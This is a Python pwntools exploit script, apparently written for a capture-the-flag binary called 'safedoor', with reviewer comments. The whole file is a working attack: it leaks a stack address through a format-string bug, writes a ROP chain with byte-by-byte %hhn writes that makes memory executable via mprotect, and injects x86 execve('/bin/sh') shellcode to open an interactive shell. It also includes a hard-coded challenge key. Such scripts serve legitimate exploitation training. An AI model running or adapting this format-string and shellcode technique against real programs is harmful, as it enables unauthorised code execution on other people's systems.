| from pwn import *
def writeData(addr, data, size):
    """Write the low ``size`` bytes of ``data`` to ``addr``, one byte at a time.

    Bytes go out little-endian: byte ``k`` of ``data`` lands at ``addr + k``.
    Each byte is delivered through ``writeByte``, so this is only as reliable
    as that single-byte primitive; the caller is responsible for making sure
    the target is in the state ``writeByte`` expects before every call.
    """
    for offset in range(size):
        # shift the wanted byte down to the low position, then mask it off
        writeByte(addr + offset, (data >> (8 * offset)) & 0xff)
def writeByte(addr, data):
    """Send one format-string payload that stores byte ``data`` at ``addr``.

    The payload relies on the target passing user input straight to a printf
    family call (the defect under test): ``%<data>c`` first pads the output to
    ``data`` characters, and ``%16$hhn`` then stores the low byte of that
    count through the pointer found in the 16th positional argument.  The
    pointer is ``p32(addr)`` appended after 'A' padding so that it sits at
    offset 48 of the payload, which is where that argument is read from
    (stack layout assumed from the original script -- confirm).
    When ``data`` is 0 the ``%c`` part is skipped (it would still print one
    character), so the bare ``%16$hhn`` stores a zero count.

    Uses the module-level ``p`` process handle.
    """
    if data != 0:
        fmt = '%' + str(data) + 'c%16$hhn'
    else:
        fmt = '%16$hhn'
    padding = 'A' * (48 - len(fmt))
    # NOTE(review): str + p32() bytes only works under Python 2 / old
    # pwntools; on Python 3 this concatenation raises TypeError -- confirm.
    p.sendline(fmt + padding + p32(addr))
def Attack():
    """Drive the interaction with the spawned ``./safedoor`` process.

    Relies on the module-level ``p`` (process) and ``elf`` (parsed binary).
    The absolute 0x0804xxxx addresses used below only hold for a 32-bit,
    non-PIE build of the target; the leak below is what makes the stack
    address usable despite ASLR on the stack.
    """
    # First prompt: answer with a format string that prints the 70th
    # positional argument as 8 hex digits -- this leaks a stack address.
    p.recvuntil('KEY:')
    p.sendline('%70$08x')
    recv_content = p.recvuntil('KEY:')
    # Slice assumes the 8-digit leak sits right before a 5-character tail
    # ('KEY:' plus one more character).  Fragile -- verify against the
    # program's actual prompt format.
    addr_stack_leak = int(recv_content[-13:-5],16)
    # The return address is taken to be 0xc below the leaked value --
    # offset presumably determined in a debugger; confirm for this build.
    addr_ret = addr_stack_leak - 0xc
    # Stack layout written at addr_ret: mprotect(0x804a000, 0x1000, 0x7)
    # where 0x7 is PROT_READ|PROT_WRITE|PROT_EXEC, then gets(0x804a000).
    # 0x80486cd is presumably a gadget that discards the three mprotect
    # arguments before the next frame -- not verifiable from here.
    rop_list = [elf.symbols['mprotect'],0x80486cd,0x804a000,0x1000,0x7,elf. symbols['gets'],0x804a000,0x804a000]
    # NOTE(review): debugger attach left in from development; it needs a
    # terminal and gdb present and will stall the run otherwise.
    gdb.attach(p)
    # Each 4-byte word is written with four single-byte format-string
    # writes, so this sends 32 payloads, each expecting the 'KEY:' prompt
    # to be handled by the target in between (see writeByte).
    for i,v in enumerate (rop_list):
        writeData(addr_ret + i * 4, v, 4)
    # Hard-coded value the program accepts as the key (see the
    # 'okey,you entered it.' message that follows) -- taken from the
    # challenge, not derived here.
    p.recvuntil('KEY:')
    p.sendline('STjJaOEwLszsLwRy')
    p.recvuntil('okey,you entered it.')
    # Bytes fed to gets() into the page made writable+executable above;
    # string literals are used as raw bytes, which is Python 2 semantics.
    shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73'
    shellcode += '\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0'
    shellcode += '\x0b\xcd\x80'
    p.sendline(shellcode)
    # Hand the connection to the user.
    p.interactive()
if __name__ == '__main__':
    # Both names are module globals read by Attack() and writeByte();
    # the binary is parsed first so symbol lookups are available, then
    # the process is spawned and driven.  Order matters: Attack() expects
    # a freshly started process waiting at its first prompt.
    elf = ELF('./safedoor')
    p = process('./safedoor')
    Attack()